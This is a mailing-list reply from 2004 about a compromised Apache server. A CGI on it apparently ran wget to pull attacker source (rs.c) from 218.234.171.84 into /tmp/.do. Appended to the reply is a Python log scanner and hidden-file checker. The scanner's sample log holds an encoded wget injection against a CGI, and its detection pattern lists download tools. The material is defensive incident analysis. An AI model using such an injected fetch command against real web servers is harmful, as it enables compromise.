
RE: [suse-security] Re: Backdoor over http(s)??



Hi Mark,

I'm not sure I can follow everything concerning this issue. Maybe you
could clarify this somehow so that a n00b liek me can follow ;-)

On Tue, 13.01.2004 at 16:20, Retallack, Mark (Siemens) wrote:
> It looks like the source was left on the server (along with other things):

Is this just another compromised machine or the origin? A portscan shows
several open ports and the machine seems to be a Solaris 8 with an
estimated uptime of 33 days according to nmap.

> httpREMOVE://218.234.171.84/manual/.x/rs.c
> 
> Only follow the link if you know what you are doing (and remove the REMOVE
> text)

I don't quite understand why displaying rs.c in a browser window could
be harmful or am I missing something here and this URL initiates
something else inside the browser?

> The rest of the files:
> 
> httpREMOVE://218.234.171.84/manual/.x/

I've given them a look. Has anybody ever heard of a "pokemon squadron
hacking team"?!

> > > Some CGI at your webserver did run wget to receive some file from
> > > 218.234.171.84 and save it on your disc as "/tmp/.do".

Do you know how this CGI ended up on the machine? By some Apache exploit
maybe?

> > > wwwrun:nogroup are standard user and group used for apache.

Can such a CGI do any harm running as this user? Or are CGI scripts
started by Apache executed as another user?

kind regards,
Tobias
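Two of the questions above (how a CGI came to run wget, and what a hidden file such as /tmp/.do looks like afterwards) are the kind an admin answers by reading the access log and listing /tmp. The script below is an added example written for this thread, not code from any poster: it parses Apache combined-format log lines, flags requests to /cgi-bin/ whose decoded query string names a download tool, the IP quoted in the thread (218.234.171.84) or a hidden file under /tmp, and lists hidden files in a directory the way one would inspect /tmp on the compromised host. The log lines, the client addresses and the temporary directory are constructed for the example; only the IP and the /tmp/.do path come from the thread.

```python
import os
import re
import tempfile
from urllib.parse import unquote_plus, urlsplit

# The IP address and download path quoted in the thread; everything else in this
# example is constructed.
THREAD_IP = "218.234.171.84"
DOWNLOAD_TOOLS = re.compile(r"\b(wget|curl|fetch|lynx)\b", re.IGNORECASE)
HIDDEN_TMP_PATH = re.compile(r"/tmp/\.[^\s/]+")

# Apache "combined" format: client ident user [time] "method target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log lines (not from the original thread). The third line is
# what a CGI fetching rs.c into /tmp/.do via wget could leave behind.
SAMPLE_LOG = """\
10.0.0.5 - - [13/Jan/2004:15:58:01 +0100] "GET /index.html HTTP/1.1" 200 2326 "-" "Mozilla/4.0"
10.0.0.9 - - [13/Jan/2004:16:02:17 +0100] "GET /cgi-bin/search.cgi?q=linux HTTP/1.0" 200 512 "-" "Lynx"
203.0.113.7 - - [13/Jan/2004:16:03:44 +0100] "GET /cgi-bin/search.cgi?q=wget%20http%3A%2F%2F218.234.171.84%2Fmanual%2F.x%2Frs.c%20-O%20%2Ftmp%2F.do HTTP/1.0" 200 85 "-" "Wget/1.8"
"""


def classify_request(line):
    """Return the reasons a log line looks like a CGI being used to fetch a file.

    An empty list means the request looks benign; a line the regex cannot parse
    yields ['unparseable line'] so it is never silently dropped.
    """
    m = LOG_RE.match(line)
    if not m:
        return ["unparseable line"]
    parts = urlsplit(m.group("target"))
    if not parts.path.startswith("/cgi-bin/"):
        return []  # static content: nothing executes on the server side
    # Decode once so %2F, %20 and '+' cannot hide the parameters from the checks.
    decoded = unquote_plus(parts.query)
    reasons = []
    if DOWNLOAD_TOOLS.search(decoded):
        reasons.append("download tool named in CGI query")
    if THREAD_IP in decoded:
        reasons.append("references " + THREAD_IP)
    if HIDDEN_TMP_PATH.search(decoded):
        reasons.append("writes to a hidden file under /tmp")
    return reasons


def scan_log(text):
    """Run classify_request over every non-empty line; return the flagged ones."""
    hits = []
    for number, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        reasons = classify_request(line)
        if reasons:
            m = LOG_RE.match(line)
            hits.append({
                "line": number,
                "client": m.group("client") if m else None,
                "reasons": reasons,
            })
    return hits


def hidden_files(directory):
    """List (name, owner uid) of hidden regular files directly under `directory`.

    This is the check an admin runs on /tmp after seeing a file like /tmp/.do:
    a dotfile owned by the web server's uid is worth a closer look.
    """
    found = []
    with os.scandir(directory) as entries:
        for entry in entries:
            if entry.name.startswith(".") and entry.is_file(follow_symlinks=False):
                found.append((entry.name, entry.stat(follow_symlinks=False).st_uid))
    return sorted(found)


def demo_hidden_files():
    """Build a constructed stand-in for /tmp and return the hidden file names found."""
    with tempfile.TemporaryDirectory() as directory:
        for name in (".do", "index.html"):
            open(os.path.join(directory, name), "w").close()
        return [name for name, _uid in hidden_files(directory)]


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("line %d from %s: %s" % (hit["line"], hit["client"], "; ".join(hit["reasons"])))
    print("hidden files in constructed /tmp:", demo_hidden_files())
```

Running a real log through `scan_log` only answers the question "which request made the CGI fetch something"; whether the file is still on disk, and who owns it, is what `hidden_files("/tmp")` shows. The owner uid matters for the last question in the mail: if the dotfile belongs to wwwrun, the download happened with the web server's privileges and nothing more.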

